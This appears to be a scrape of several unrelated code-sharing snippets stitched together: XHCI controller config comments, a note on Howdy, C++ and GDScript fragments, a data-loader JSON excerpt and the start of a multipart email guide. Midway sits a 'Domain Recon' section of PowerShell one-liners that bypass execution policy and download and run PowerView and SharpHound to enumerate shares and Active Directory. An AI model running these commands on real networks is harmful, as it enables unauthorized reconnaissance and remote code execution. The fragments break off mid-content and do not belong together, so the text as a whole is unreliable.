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# The variables starting with $GLOBAL store values that should be applied to all XHCI controllers by default. | |
# To override this default value on a per-controller basis, specify the DEV_XXXX hardware ID value for the XHCI controller along with its data | |
# See the example below. | |
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# $globalInterval = 0x0 | |
# $globalHCSPARAMSOffset = 0x4 |
This is surprisingly easy...basically following Arch Wiki:
https://wiki.archlinux.org/index.php/Howdy
After some investigation, here is step by step and preferences
# Domain Recon | |
## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
## Import PowerView Module | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
## Invoke-BloodHound for domain recon | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
wchar_t *convertCharArrayToLPCWSTR(const char* charArray) | |
{ | |
wchar_t* wString=new wchar_t[4096]; | |
MultiByteToWideChar(CP_ACP, 0, charArray, -1, wString, 4096); | |
return wString; | |
} |
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"objects": [ | |
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"operation": "Insert", | |
"externalId": "Id", | |
"mockFields": [], | |
"updateWithMockData": false, | |
"mockCSVData": false, | |
"deleteOldData": true, | |
"allRecords": true, |
This is a guide on how to send a properly formatted multipart email. Multipart email strings are MIME encoded, raw text email templates. This method of structuring an email allows for multiple versions of the same email to support different email clients.
// Example Multipart Email:
From: sender@example.com
To: recipient@example.com
Subject: Multipart Email Example
Content-Type: multipart/alternative; boundary="boundary-string"
@tool | |
class_name EditorIconTexture | |
extends AtlasTexture | |
var icon :String: | |
set(val): | |
icon = val | |
_update_icon.call_deferred() | |
func _init(): |